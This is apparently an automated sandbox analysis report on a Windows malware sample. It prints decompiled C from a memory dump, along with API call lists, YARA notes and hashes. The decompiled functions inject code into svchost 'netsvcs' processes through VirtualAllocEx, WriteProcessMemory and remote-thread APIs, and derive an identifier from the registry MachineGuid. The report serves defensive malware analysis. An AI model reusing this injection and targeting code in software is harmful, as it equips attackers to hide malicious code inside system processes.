								_t133 = VirtualAllocEx(_t139, 0, _t104, 0x3000, 0x40);
								_v44 = _t133;
								if(_t133 != 0) {
									if(WriteProcessMemory(_t139, _t133, _v52, _t104,  &_v36) != 0 && _v36 == _t104) {
										_t68 = E04EC5C00(_t133);
										if(_t68 != 0) {
											L24:
											_t70 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlCreateUserThread");
											if(_t70 == 0) {
												L26:
												_v48 = 0;
												_t72 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx");
												if(_t72 != 0) {
													 *_t72( &_v48, 0x1fffff, 0, _t139, _v44, 0, 0, 0, 0, 0, 0);
												}
												_t73 = _v48;
												_t135 = _t73;
												if(_t73 != 0) {
													goto L29;
												}
											} else {
												_v52 = 0;
												 *_t70(_t139, 0, 0, 0, 0, 0, _t133, 0,  &_v52, 0);
												_t135 = _v92;
												if(_t135 != 0) {
													goto L29;
												} else {
													goto L26;
												}
											}
										} else {
											_t135 = CreateRemoteThread(_t139, _t68, _t68, _t133, _t68, _t68, _t68);
											if(_t135 != 0) {
												L29:
												WaitForSingleObject(_t135, 0xffffffff);
												CloseHandle(_t135);
												_v36 = 1;
											} else {
												_t133 = _v48;
												goto L24;
											}
										}
										_t133 = _v44;
									}
									VirtualFreeEx(_t139, _t133, _t104, 0x4000);
								}
							} else {
								_v48 = 0;
								_t81 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
								if(_t81 != 0) {
									 *_t81(_t139,  &_v48);
								}
								if(_v48 != 0) {
									goto L18;
								} else {
									_t127 = _t104;
									_t82 = E04EC8C20(_t139, _t127); // executed
									_t136 = _t82;
									_t144 = _t144 - 0x10 + 0x10;
									_t83 = _t127;
									_v44 = _t83;
									if((_t136 | _t83) != 0) {
										_t128 = _v52;
										_t118 = _t139;
										_t84 = E04EC8E80(_t118, _t128, _t136, _t83, _t104,  &_v40);
										_t146 = _t144 + 0x10;
										if(_t84 != 0 && _v40 == _t104) {
											_v48 = 0;
											_t87 = E04EC8B50(_t104, "RtlCreateUserThread", _t128, _t136, _t139, E04EC8350(_t118), _t128);
											_v40 = _t87;
											_t147 = _t146 + 8;
											_v52 = _t128;
											_t118 = _t87 | _t128;
											if(_t118 == 0) {
												L12:
												_v40 = 0;
												_t89 = E04EC8B50(_t104, "NtCreateThreadEx", _t128, _t136, _t139, E04EC8350(_t118), _t128);
												_v36 = _t89;
												_t146 = _t147 + 8;
												_v52 = _t128;
												_t118 = _t89 | _t128;
												if(_t118 != 0) {
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(_v44);
													_push(_t136);
													asm("cdq");
													_push(_t128);
													_push(_t139);
													_push(0);
													_push(0);
													_push(0);
													asm("cdq");
													E04EC8170(_v36, _v52, 0xb,  &_v40, _t128, 0x1fffff);
													_t93 = _v40;
													_t146 = _t146 + 0x64;
													_v52 = _t93;
													if(_t93 != 0) {
														goto L14;
													}
												}
											} else {
												asm("cdq");
												_push(_t128);
												_push( &_v28);
												asm("cdq");
												_push(_t128);
												_push( &_v48);
												_push(0);
												_push(0);
												_push(_v44);
												_push(_t136);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												asm("cdq");
												E04EC8170(_v40, _v52, 0xa, _t139, _t128, 0);
												_t93 = _v48;
												_t146 = _t147 + 0x5c;
												_v52 = _t93;
												if(_t93 != 0) {
													L14:
													WaitForSingleObject(_t93, 0xffffffff);
													FindCloseChangeNotification(_v52); // executed
													_v32 = 1;
												} else {
													goto L12;
												}
											}
										}
										_push(_t118);
										E04EC8D50(_t139, _t104, _t136, _v44);
										_t144 = _t146 + 0xc;
									}
								}
							}
							CloseHandle(_t139);
							return E04ED572E(_v8 ^ _t144);
						}
					}
				}
			}







































                                                                                    0x04ec8fd6
                                                                                    0x04ec8fd9
                                                                                    0x04ec8fe0
                                                                                    0x04ec8fe4
                                                                                    0x04ec8fe5
                                                                                    0x04ec8fe8
                                                                                    0x04ec8fe9
                                                                                    0x04ec8ff0
                                                                                    0x04ec8ff7
                                                                                    0x04ec8ffb
                                                                                    0x04ec9013
                                                                                    0x04ec9206
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9019
                                                                                    0x04ec9024
                                                                                    0x04ec9028
                                                                                    0x04ec920c
                                                                                    0x04ec921f
                                                                                    0x04ec902e
                                                                                    0x04ec902e
                                                                                    0x04ec903c
                                                                                    0x04ec9040
                                                                                    0x00000000
                                                                                    0x04ec9046
                                                                                    0x04ec9046
                                                                                    0x04ec904d
                                                                                    0x04ec9220
                                                                                    0x04ec9231
                                                                                    0x04ec9233
                                                                                    0x04ec9239
                                                                                    0x04ec9253
                                                                                    0x04ec9263
                                                                                    0x04ec926a
                                                                                    0x04ec9287
                                                                                    0x04ec9298
                                                                                    0x04ec92a0
                                                                                    0x04ec92c9
                                                                                    0x04ec92d3
                                                                                    0x04ec92e2
                                                                                    0x04ec92ea
                                                                                    0x04ec9309
                                                                                    0x04ec9309
                                                                                    0x04ec930b
                                                                                    0x04ec930f
                                                                                    0x04ec9313
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec92a2
                                                                                    0x04ec92a8
                                                                                    0x04ec92bf
                                                                                    0x04ec92c1
                                                                                    0x04ec92c7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec92c7
                                                                                    0x04ec926c
                                                                                    0x04ec9279
                                                                                    0x04ec927d
                                                                                    0x04ec9315
                                                                                    0x04ec9318
                                                                                    0x04ec9324
                                                                                    0x04ec9326
                                                                                    0x04ec9283
                                                                                    0x04ec9283
                                                                                    0x00000000
                                                                                    0x04ec9283
                                                                                    0x04ec927d
                                                                                    0x04ec932e
                                                                                    0x04ec932e
                                                                                    0x04ec933a
                                                                                    0x04ec933a
                                                                                    0x04ec9053
                                                                                    0x04ec905d
                                                                                    0x04ec9068
                                                                                    0x04ec9070
                                                                                    0x04ec9078
                                                                                    0x04ec9078
                                                                                    0x04ec907f
                                                                                    0x00000000
                                                                                    0x04ec9085
                                                                                    0x04ec9088
                                                                                    0x04ec908c
                                                                                    0x04ec9091
                                                                                    0x04ec9093
                                                                                    0x04ec9096
                                                                                    0x04ec909c
                                                                                    0x04ec90a0
                                                                                    0x04ec90a6
                                                                                    0x04ec90b2
                                                                                    0x04ec90b4
                                                                                    0x04ec90b9
                                                                                    0x04ec90be
                                                                                    0x04ec90ce
                                                                                    0x04ec90e2
                                                                                    0x04ec90e9
                                                                                    0x04ec90ed
                                                                                    0x04ec90f0
                                                                                    0x04ec90f4
                                                                                    0x04ec90f6
                                                                                    0x04ec914a
                                                                                    0x04ec914a
                                                                                    0x04ec915e
                                                                                    0x04ec9165
                                                                                    0x04ec9169
                                                                                    0x04ec916c
                                                                                    0x04ec9170
                                                                                    0x04ec9172
                                                                                    0x04ec9174
                                                                                    0x04ec9176
                                                                                    0x04ec9178
                                                                                    0x04ec917a
                                                                                    0x04ec917c
                                                                                    0x04ec917e
                                                                                    0x04ec9180
                                                                                    0x04ec9182
                                                                                    0x04ec9184
                                                                                    0x04ec9186
                                                                                    0x04ec9188
                                                                                    0x04ec918a
                                                                                    0x04ec918c
                                                                                    0x04ec9192
                                                                                    0x04ec9193
                                                                                    0x04ec9194
                                                                                    0x04ec9195
                                                                                    0x04ec9196
                                                                                    0x04ec9198
                                                                                    0x04ec919a
                                                                                    0x04ec91a5
                                                                                    0x04ec91b5
                                                                                    0x04ec91ba
                                                                                    0x04ec91c1
                                                                                    0x04ec91c4
                                                                                    0x04ec91ca
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec91ca
                                                                                    0x04ec90f8
                                                                                    0x04ec90fc
                                                                                    0x04ec90fd
                                                                                    0x04ec90fe
                                                                                    0x04ec9103
                                                                                    0x04ec9104
                                                                                    0x04ec9105
                                                                                    0x04ec9106
                                                                                    0x04ec9108
                                                                                    0x04ec910a
                                                                                    0x04ec9110
                                                                                    0x04ec9111
                                                                                    0x04ec9113
                                                                                    0x04ec9115
                                                                                    0x04ec9117
                                                                                    0x04ec9119
                                                                                    0x04ec911b
                                                                                    0x04ec911d
                                                                                    0x04ec911f
                                                                                    0x04ec9121
                                                                                    0x04ec9125
                                                                                    0x04ec9132
                                                                                    0x04ec9137
                                                                                    0x04ec913b
                                                                                    0x04ec913e
                                                                                    0x04ec9144
                                                                                    0x04ec91cc
                                                                                    0x04ec91cf
                                                                                    0x04ec91de
                                                                                    0x04ec91e0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9144
                                                                                    0x04ec90f6
                                                                                    0x04ec91e8
                                                                                    0x04ec91f2
                                                                                    0x04ec91f7
                                                                                    0x04ec91f7
                                                                                    0x04ec90a0
                                                                                    0x04ec907f
                                                                                    0x04ec9341
                                                                                    0x04ec935c
                                                                                    0x04ec935c
                                                                                    0x04ec9040
                                                                                    0x04ec9028

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32 ref: 04EC9003
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 04EC900B
                                                                                    • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 04EC9024
                                                                                    • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 04EC9036
                                                                                      • Part of subcall function 04EC5920: LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04ECBFAB), ref: 04EC5930
                                                                                      • Part of subcall function 04EC5920: GetProcAddress.KERNEL32(00000000), ref: 04EC5937
                                                                                      • Part of subcall function 04EC5920: GetNativeSystemInfo.KERNEL32(?), ref: 04EC5957
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EC9065
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC9068
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC91CF
                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 04EC91DE
                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,04ECBC35,00003000,00000040), ref: 04EC922B
                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,04ECBC35,?), ref: 04EC924B
                                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EC9273
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,RtlCreateUserThread), ref: 04EC9291
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC9298
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,NtCreateThreadEx), ref: 04EC92DB
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC92E2
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC9318
                                                                                    • VirtualFreeEx.KERNEL32(00000000,00000000,04ECBC35,00004000), ref: 04EC933A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC9341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc$CloseObjectProcessSingleVirtualWait$AdjustAllocChangeCreateFindFreeHandleInfoMemoryNativeNotificationOpenPrivilegeRemoteSystemThreadWrite
                                                                                    • String ID: IsWow64Process$NtCreateThreadEx$RtlAdjustPrivilege$RtlCreateUserThread$kernel32.dll$ntdll.dll
                                                                                    • API String ID: 2461120785-1625205875
                                                                                    • Opcode ID: 17f8af857cc16d5d41a3099f108a80e4cc78fd53aa6185c5269af594761bcb18
                                                                                    • Instruction ID: 722b38b70a16435917e764dc6d02d040037a43c586f686098809517f207e16f6
                                                                                    • Opcode Fuzzy Hash: 17f8af857cc16d5d41a3099f108a80e4cc78fd53aa6185c5269af594761bcb18
                                                                                    • Instruction Fuzzy Hash: BB91D3B1204301AFE714EF259D05F7B7AE9EFC4B19F10191DF954D2280EB74E9068BA6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECB9A0, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 223serviceCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 61%
                                                                                    			E04ECB9A0(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v408;
				struct _QUERY_SERVICE_CONFIG* _v412;
				char _v416;
				short* _v420;
				char _v424;
				intOrPtr _v428;
				void* _v432;
				short* _v436;
				int _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				signed int _t58;
				void* _t63;
				char _t68;
				void* _t69;
				void* _t71;
				intOrPtr _t72;
				void* _t79;
				void* _t80;
				int _t82;
				WCHAR* _t85;
				signed int _t87;
				void* _t101;
				long _t102;
				void* _t103;
				void* _t108;
				intOrPtr _t112;
				intOrPtr _t123;
				void* _t124;
				void* _t126;
				void* _t128;
				intOrPtr* _t132;
				signed int _t134;
				intOrPtr* _t137;
				signed int _t142;
				void* _t143;
				void* _t144;

				_t124 = __edi;
				_t58 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t58 ^ _t142;
				_v448 = __edx;
				_v436 = 0;
				_v424 = 0;
				_v416 = 0;
				_v420 = 0;
				_v444 = __ecx;
				E04EDDAD0(__edi,  &_v408, 0, 0x190);
				_t144 = _t143 + 0xc;
				_t63 = OpenSCManagerW(0, 0, 0xf003f); // executed
				_t101 = _t63;
				_v412 = _t101;
				if(_t101 != 0) {
					_t132 = __imp__EnumServicesStatusExW;
					 *_t132(_t101, 0, 0x30, 1, 0, 0,  &_v424,  &_v416,  &_v420, 0, __esi);
					_t68 = _v424;
					if(_t68 != 0) {
						_push(_t124);
						_t102 = _t68 + 0x2c;
						_t69 = LocalAlloc(0x40, _t102); // executed
						_v432 = _t69;
						if(_t69 != 0) {
							_push(0);
							_v420 = 0;
							_push( &_v420);
							_push( &_v416);
							_push( &_v424);
							_push(_t102);
							_t103 = _v412;
							_push(_t69);
							_push(1);
							_push(0x30);
							_push(0);
							_push(_t103);
							if( *_t132() != 0) {
								_t71 = LocalAlloc(0x40, 0x2000);
								_t126 = CloseServiceHandle;
								_t108 = _t71;
								_t72 = 0;
								_v412 = _t108;
								_v440 = 0;
								_v428 = 0;
								if(_v416 > 0) {
									_t137 = _v432 + 0x24;
									asm("o16 nop [eax+eax]");
									do {
										if( *((intOrPtr*)(_t137 - 0x18)) == 4) {
											_t80 = OpenServiceW(_t103,  *(_t137 - 0x24), 1); // executed
											_t128 = _t80;
											if(_t128 == 0) {
												_t126 = CloseServiceHandle;
											} else {
												_t82 = QueryServiceConfigW(_t128, _v412, 0x2000,  &_v440); // executed
												if(_t82 == 0) {
													L21:
													_t126 = CloseServiceHandle;
													CloseServiceHandle(_t128);
												} else {
													_t85 =  *(_v412 + 0xc);
													if(_t85 != 0 && StrStrIW(_t85, L"-k netsvcs") != 0) {
														_t123 =  *_t137;
														_t87 = 0;
														asm("o16 nop [eax+eax]");
														while(1) {
															_t112 =  *((intOrPtr*)(_t142 + _t87 * 4 - 0x194));
															if(_t112 == _t123) {
																goto L21;
															}
															if(_t112 == 0) {
																 *((intOrPtr*)(_t142 + _t87 * 4 - 0x194)) = _t123;
																goto L21;
															} else {
																_t87 = _t87 + 1;
																if(_t87 < 0x64) {
																	continue;
																} else {
																	_t126 = CloseServiceHandle;
																	CloseServiceHandle(_t128);
																}
															}
															goto L23;
														}
													}
													goto L21;
												}
											}
											L23:
											_t72 = _v428;
										}
										_t72 = _t72 + 1;
										_t137 = _t137 + 0x2c;
										_v428 = _t72;
									} while (_t72 < _v416);
									_t108 = _v412;
								}
								LocalFree(_t108);
								LocalFree(_v432);
								CloseServiceHandle(_t103);
								_t134 = 0;
								while(1) {
									_t109 =  *((intOrPtr*)(_t142 + _t134 * 4 - 0x194));
									if( *((intOrPtr*)(_t142 + _t134 * 4 - 0x194)) == 0) {
										break;
									}
									_t122 = _v444;
									if(_v444 != 0) {
										_t78 = _v448;
										if(_v448 != 0) {
											_t79 = E04EC8FD0(_t103, _t109, _t122, _t126, _t134, _t78); // executed
											_t144 = _t144 + 4;
											if(_t79 != 0) {
												_v436 = _v436 + 1;
											}
										}
									}
									_t134 = _t134 + 1;
									if(_t134 < 0x64) {
										continue;
									}
									break;
								}
								return E04ED572E(_v8 ^ _t142);
							} else {
								CloseServiceHandle(_t103);
								LocalFree(_v432);
								return E04ED572E(_v8 ^ _t142);
							}
						} else {
							CloseServiceHandle(_v412);
							return E04ED572E(_v8 ^ _t142);
						}
					} else {
						CloseServiceHandle(_t101);
						return E04ED572E(_v8 ^ _t142);
					}
				} else {
					return E04ED572E(_v8 ^ _t142);
				}
			}









































                                                                                    0x04ecb9a0
                                                                                    0x04ecb9a9
                                                                                    0x04ecb9b0
                                                                                    0x04ecb9b5
                                                                                    0x04ecb9c2
                                                                                    0x04ecb9c8
                                                                                    0x04ecb9ce
                                                                                    0x04ecb9d4
                                                                                    0x04ecb9e1
                                                                                    0x04ecb9e7
                                                                                    0x04ecb9ec
                                                                                    0x04ecb9f8
                                                                                    0x04ecb9fe
                                                                                    0x04ecba00
                                                                                    0x04ecba08
                                                                                    0x04ecba1a
                                                                                    0x04ecba42
                                                                                    0x04ecba44
                                                                                    0x04ecba4c
                                                                                    0x04ecba67
                                                                                    0x04ecba6e
                                                                                    0x04ecba74
                                                                                    0x04ecba76
                                                                                    0x04ecba7e
                                                                                    0x04ecba9f
                                                                                    0x04ecbaa7
                                                                                    0x04ecbab1
                                                                                    0x04ecbab8
                                                                                    0x04ecbabf
                                                                                    0x04ecbac0
                                                                                    0x04ecbac1
                                                                                    0x04ecbac7
                                                                                    0x04ecbac8
                                                                                    0x04ecbaca
                                                                                    0x04ecbacc
                                                                                    0x04ecbace
                                                                                    0x04ecbad3
                                                                                    0x04ecbb03
                                                                                    0x04ecbb05
                                                                                    0x04ecbb0b
                                                                                    0x04ecbb0d
                                                                                    0x04ecbb0f
                                                                                    0x04ecbb15
                                                                                    0x04ecbb1f
                                                                                    0x04ecbb2b
                                                                                    0x04ecbb37
                                                                                    0x04ecbb3a
                                                                                    0x04ecbb40
                                                                                    0x04ecbb44
                                                                                    0x04ecbb50
                                                                                    0x04ecbb56
                                                                                    0x04ecbb5a
                                                                                    0x04ecbbd2
                                                                                    0x04ecbb5c
                                                                                    0x04ecbb6f
                                                                                    0x04ecbb77
                                                                                    0x04ecbbc7
                                                                                    0x04ecbbc8
                                                                                    0x04ecbbce
                                                                                    0x04ecbb79
                                                                                    0x04ecbb7f
                                                                                    0x04ecbb84
                                                                                    0x04ecbb96
                                                                                    0x04ecbb98
                                                                                    0x04ecbb9a
                                                                                    0x04ecbba0
                                                                                    0x04ecbba0
                                                                                    0x04ecbba9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecbbad
                                                                                    0x04ecbbc0
                                                                                    0x00000000
                                                                                    0x04ecbbaf
                                                                                    0x04ecbbaf
                                                                                    0x04ecbbb3
                                                                                    0x00000000
                                                                                    0x04ecbbb5
                                                                                    0x04ecbbb6
                                                                                    0x04ecbbbc
                                                                                    0x04ecbbbc
                                                                                    0x04ecbbb3
                                                                                    0x00000000
                                                                                    0x04ecbbad
                                                                                    0x04ecbba0
                                                                                    0x00000000
                                                                                    0x04ecbb84
                                                                                    0x04ecbb77
                                                                                    0x04ecbbd8
                                                                                    0x04ecbbd8
                                                                                    0x04ecbbd8
                                                                                    0x04ecbbde
                                                                                    0x04ecbbdf
                                                                                    0x04ecbbe2
                                                                                    0x04ecbbe8
                                                                                    0x04ecbbf4
                                                                                    0x04ecbbf4
                                                                                    0x04ecbc01
                                                                                    0x04ecbc09
                                                                                    0x04ecbc0c
                                                                                    0x04ecbc0e
                                                                                    0x04ecbc10
                                                                                    0x04ecbc10
                                                                                    0x04ecbc19
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecbc1b
                                                                                    0x04ecbc23
                                                                                    0x04ecbc25
                                                                                    0x04ecbc2d
                                                                                    0x04ecbc30
                                                                                    0x04ecbc35
                                                                                    0x04ecbc3a
                                                                                    0x04ecbc3c
                                                                                    0x04ecbc3c
                                                                                    0x04ecbc3a
                                                                                    0x04ecbc2d
                                                                                    0x04ecbc42
                                                                                    0x04ecbc46
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ecbc46
                                                                                    0x04ecbc5e
                                                                                    0x04ecbad5
                                                                                    0x04ecbad6
                                                                                    0x04ecbae3
                                                                                    0x04ecbafb
                                                                                    0x04ecbafb
                                                                                    0x04ecba80
                                                                                    0x04ecba86
                                                                                    0x04ecba9e
                                                                                    0x04ecba9e
                                                                                    0x04ecba4e
                                                                                    0x04ecba4f
                                                                                    0x04ecba66
                                                                                    0x04ecba66
                                                                                    0x04ecba0b
                                                                                    0x04ecba18
                                                                                    0x04ecba18

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?), ref: 04ECB9F8
                                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,?,00000000,00000000,?,?,?), ref: 04ECBA42
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?), ref: 04ECBA4F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                                                                    • String ID: -k netsvcs
                                                                                    • API String ID: 236840872-1604415765
                                                                                    • Opcode ID: 691213fa41972a8e461e694f27eb744b7cf55d5f7ed02e46527f6fe43c68b169
                                                                                    • Instruction ID: 66b69ee84c0bd501b09669030a74dca545ed5c8187cc22007d1f0bddde9505de
                                                                                    • Opcode Fuzzy Hash: 691213fa41972a8e461e694f27eb744b7cf55d5f7ed02e46527f6fe43c68b169
                                                                                    • Instruction Fuzzy Hash: 89718E71B01218AFEB24DF25AD51BEAB7B8EF49305F1010EAE909E7244DB74BE418F50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5C60, Relevance: 7.5, APIs: 5, Instructions: 47processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(?,74E04DC0), ref: 04EC5C75
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 04EC5C8B
                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 04EC5CA5
                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 04EC5CC6
                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 04EC5CDC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$ChangeCloseCreateCurrentFindFirstNextNotificationProcessSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 1594840063-0
                                                                                    • Opcode ID: 79a4b2eec01f7efd64033c5b9fefc262c44604b2b8d3da32a2dce471a047bbd0
                                                                                    • Instruction ID: 20dae9ee766b45cf0f43052943e0728cd8293a0283096d66236115f86debd545
                                                                                    • Opcode Fuzzy Hash: 79a4b2eec01f7efd64033c5b9fefc262c44604b2b8d3da32a2dce471a047bbd0
                                                                                    • Instruction Fuzzy Hash: B9012D70A02228ABD720EB65ED88BADB7F8EB45315F1001D9E808D2240DB38AE45CF65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC6010, Relevance: 78.9, APIs: 3, Strings: 42, Instructions: 179registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E04EC6010(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				short _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				short _v176;
				char _v252;
				void* _v256;
				int _v260;
				intOrPtr _v264;
				int _v268;
				signed int _t110;
				long _t117;
				intOrPtr _t118;
				signed int _t119;
				intOrPtr* _t142;
				void* _t144;
				signed int _t145;
				signed int _t147;
				signed short* _t156;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t171;
				void* _t173;
				signed int _t175;

				_t110 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t110 ^ _t175;
				_v264 = __edx;
				_v12 = 0;
				_v88 = 0x47007b;
				_t142 = __ecx;
				_v84 = 0x350036;
				_v80 = 0x590037;
				_v76 = 0x300053;
				_v72 = 0x2d0036;
				_v68 = 0x310030;
				_v64 = 0x440036;
				_v60 = 0x34002d;
				_v56 = 0x300043;
				_v52 = 0x2d0052;
				_v48 = 0x300036;
				_v44 = 0x320032;
				_v40 = 0x46002d;
				_v36 = 0x450047;
				_v32 = 0x430032;
				_v28 = 0x320033;
				_v24 = 0x360032;
				_v20 = 0x370036;
				_v16 = 0x7d0046;
				_v260 = 0x4a;
				_v176 = 0x4f0053;
				_v172 = 0x540046;
				_v168 = 0x410057;
				_v164 = 0x450052;
				_v160 = 0x4d005c;
				_v156 = 0x630069;
				_v152 = 0x6f0072;
				_v148 = 0x6f0073;
				_v144 = 0x740066;
				_v140 = 0x43005c;
				_v136 = 0x790072;
				_v132 = 0x740070;
				_v128 = 0x67006f;
				_v124 = 0x610072;
				_v120 = 0x680070;
				_v116 = 0x79;
				_v112 = 0x61004d;
				_v108 = 0x680063;
				_v104 = 0x6e0069;
				_v100 = 0x470065;
				_v96 = 0x690075;
				_v92 = 0x64;
				E04EDDAD0(__edi,  &_v252, 0, 0x4a);
				_v256 = 0;
				_t117 = RegOpenKeyExW(0x80000002,  &_v176, 0, 0x20119,  &_v256); // executed
				if(_t117 == 0) {
					RegQueryValueExW(_v256,  &_v112, 0,  &_v268,  &_v252,  &_v260); // executed
					_t174 =  ==  ? 1 : 0;
					RegCloseKey(_v256);
					_t180 =  ==  ? 1 : 0;
					if(( ==  ? 1 : 0) != 0 && _v260 == 0x4a) {
						asm("movups xmm0, [ebp-0xf8]");
						asm("movups [ebp-0x52], xmm0");
						asm("movups xmm0, [ebp-0xe8]");
						asm("movups [ebp-0x42], xmm0");
						asm("movups xmm0, [ebp-0xd8]");
						asm("movups [ebp-0x32], xmm0");
						asm("movups xmm0, [ebp-0xc8]");
						asm("movups [ebp-0x22], xmm0");
						asm("movq xmm0, [ebp-0xb8]");
						asm("movq [ebp-0x12], xmm0");
					}
				}
				_t169 = _t142;
				_t144 = _t169 + 2;
				do {
					_t118 =  *_t169;
					_t169 = _t169 + 2;
				} while (_t118 != 0);
				_t166 = 1;
				_t171 = _t169 - _t144 >> 1;
				asm("o16 nop [eax+eax]");
				do {
					_t119 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
					if(_t119 >= 0x61 && _t119 <= 0x7a) {
						 *(_t175 + _t166 * 2 - 0x54) = _t119 + 0xffffffe0;
					}
					if( *(_t175 + _t166 * 2 - 0x54) != 0x2d) {
						asm("cdq");
						 *(_t175 + _t166 * 2 - 0x54) =  *(_t175 + _t166 * 2 - 0x54) ^  *(_t142 + _t166 % _t171 * 2);
						_t145 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
						if(_t145 >= 0x30) {
							_t89 = _t145 - 0x3a; // -13
							if(_t89 > 6) {
								if(_t145 > 0x5a) {
									 *(_t175 + _t166 * 2 - 0x54) = 0x5a - _t145 % 0x1a;
								}
							} else {
								 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0x1a + 0x41;
							}
						} else {
							 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0xa + 0x30;
						}
					}
					_t166 = _t166 + 1;
				} while (_t166 < 0x25);
				_t156 =  &_v88;
				_t173 = _v264 - _t156;
				do {
					_t147 =  *_t156 & 0x0000ffff;
					_t156 =  &(_t156[1]);
					 *(_t173 + _t156 - 2) = _t147;
				} while (_t147 != 0);
				return E04ED572E(_v8 ^ _t175);
			}

































































                                                                                    0x04ec6019
                                                                                    0x04ec6020
                                                                                    0x04ec6028
                                                                                    0x04ec6030
                                                                                    0x04ec603c
                                                                                    0x04ec6045
                                                                                    0x04ec6047
                                                                                    0x04ec604e
                                                                                    0x04ec6055
                                                                                    0x04ec605c
                                                                                    0x04ec6063
                                                                                    0x04ec606a
                                                                                    0x04ec6071
                                                                                    0x04ec6078
